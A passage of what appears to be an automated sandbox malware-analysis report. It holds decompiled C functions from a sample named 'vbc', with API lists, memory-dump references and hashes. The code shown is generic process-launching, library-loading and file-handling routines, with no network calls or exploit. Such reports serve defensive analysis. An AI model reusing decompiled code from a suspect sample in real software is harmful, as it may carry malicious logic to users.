				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                          0x00405c5a
                                          0x00405c7a
                                          0x00405c82
                                          0x00405c87
                                          0x00000000
                                          0x00405c8d
                                          0x00405c91

                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                          • CloseHandle.KERNEL32(?), ref: 00405C87
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                          • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                                          • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                          • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                          0x00406a43
                                          0x00406a46
                                          0x00406a4d
                                          0x00406a55
                                          0x00406a61
                                          0x00000000
                                          0x00406a68
                                          0x00406a58
                                          0x00406a5f
                                          0x00000000
                                          0x00406a70
                                          0x00000000

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                            • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                            • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                                            • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                          • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                                          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                          • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                          0x00406162
                                          0x0040616f
                                          0x00406184
                                          0x0040618a

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                          0x0040613e
                                          0x00406144
                                          0x00406149
                                          0x00406152
                                          0x00406152
                                          0x0040615b

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                          • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                          • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                          0x00405c22
                                          0x00405c2a
                                          0x00000000
                                          0x00405c30
                                          0x00000000

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                          • GetLastError.KERNEL32 ref: 00405C30
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                          • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                          • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x00406214
                                          0x00406224
                                          0x0040622c
                                          0x00000000
                                          0x00406233
                                          0x00000000
                                          0x00406235

                                          APIs
                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00406224
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x004061e5
                                          0x004061f5
                                          0x004061fd
                                          0x00000000
                                          0x00406204
                                          0x00000000
                                          0x00406206

                                          APIs
                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061F5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                          • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                          • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                          0x0040360c
                                          0x00403612

                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                          0x00401faa
                                          0x00401faf
                                          0x00401fb5
                                          0x00401fba
                                          0x00401fbe
                                          0x0040292e
                                          0x00401fc4
                                          0x00401fc7
                                          0x00401fca
                                          0x00401fd2
                                          0x00401fe1
                                          0x00401fe3
                                          0x00401fe3
                                          0x00401fd4
                                          0x00401fd8
                                          0x00401fd8
                                          0x00401fd2
                                          0x00401fea
                                          0x00401feb
                                          0x00401feb
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                            • Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                            • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                                          • CloseHandle.KERNEL32(?), ref: 00401FEB
                                            • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                            • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                            • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 2972824698-0
                                          • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                          • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                                          • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                          • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
